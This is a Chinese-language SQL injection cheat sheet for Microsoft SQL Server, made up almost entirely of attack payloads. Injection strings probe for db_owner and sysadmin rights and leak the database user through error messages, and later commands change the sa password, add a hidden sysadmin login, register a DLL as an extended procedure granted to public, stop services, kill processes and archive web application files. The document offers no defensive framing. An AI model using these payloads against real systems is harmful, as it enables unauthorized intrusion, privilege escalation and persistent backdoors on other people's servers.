//看看是什么权限的

and 1=(Select IS_MEMBER('db_owner'))

And char(124)+Cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1 ;--

//检测是否有读取某数据库的权限

and 1= (Select HAS_DBACCESS('master'))

And char(124)+Cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1 --

数字类型

and char(124)+user+char(124)=0

字符类型

' and char(124)+user+char(124)=0 and ''='

搜索类型

' and char(124)+user+char(124)=0 and '%'='

爆用户名

 and user>0

' and user>0 and ''='

检测是否为SA权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1 --

……..(从略)

//爆出长度

And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 ;--

更改sa口令方法：用sql综合利用工具连接后，执行命令：

exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:

exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程

EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'

GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。

xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。

所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab

'c:\test.cab','mszip',1,

'C:\Inetpub\wwwroot\SQLInject\login.asp',

'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。

利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

//更新表内容

Update films SET kind = 'Dramatic' Where id = 123

//删除内容

delete from table_name where Stockid = 3